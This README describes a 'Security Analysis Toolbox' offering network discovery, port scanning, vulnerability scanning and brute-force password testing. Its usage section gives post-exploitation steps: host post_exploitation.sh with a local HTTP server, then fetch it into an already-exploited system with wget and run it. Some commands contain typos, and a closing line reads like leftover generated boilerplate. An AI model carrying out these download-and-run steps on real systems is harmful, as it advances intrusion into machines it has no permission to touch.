This toolbox is designed to provide comprehensive tools for network and vulnerability analysis, as well as password security assessment. It aims to help security professionals and IT administrators to efficiently manage and assess security across their networks.
- Network Discovery: Discover all devices connected to the network.
- Port Scanning: Analyze open ports to identify potential vulnerabilities.
- Device Detection: Detect all devices connected to the network and their status.
- Vulnerability Scanner: Scan systems for known vulnerabilities to mitigate potential threats.
- Advanced Scanning: Conduct in-depth scans to uncover and assess deeper system vulnerabilities.
- Brute Force Attack Resistance Test: Test the strength of passwords against common brute-force methods.
To set up the Security Analysis Toolbox, clone this repository and install the required dependencies:
RUN main.py on command line with a command as shown below:
To deploy this project run
python main.py IP-Address --start-port 1 --end-port 40
After the shell is opened follow these instructions
- Open a command terminal on your PC where the post_explotation.sh file is located and run 'pyhton -m http.server' to host the file
- Now on the shell run 'wget http://Your-IP-Address:8000/post_exploitation.sh', it will transfer the file in the exploited system
- Confirm that the file has been transferred using 'ls; command
- Now run chmod +x post_exploitation
- Now run ./post_exploitation
and it will output the python vulnerabilities scripts.
Follow the on-screen menus to select the type of analysis you wish to perform.
Contributions to this project are welcome. Please fork the repository and submit a pull request.
This project is licensed under the MIT License - see the LICENSE file for details.
For support or any questions, email us at info@cyberevangelists.com.
This README provides a concise yet comprehensive guide to your toolbox, outlining its features, installation instructions, usage guide, and ways to contribute. Adjust the content according to your actual setup and repository details.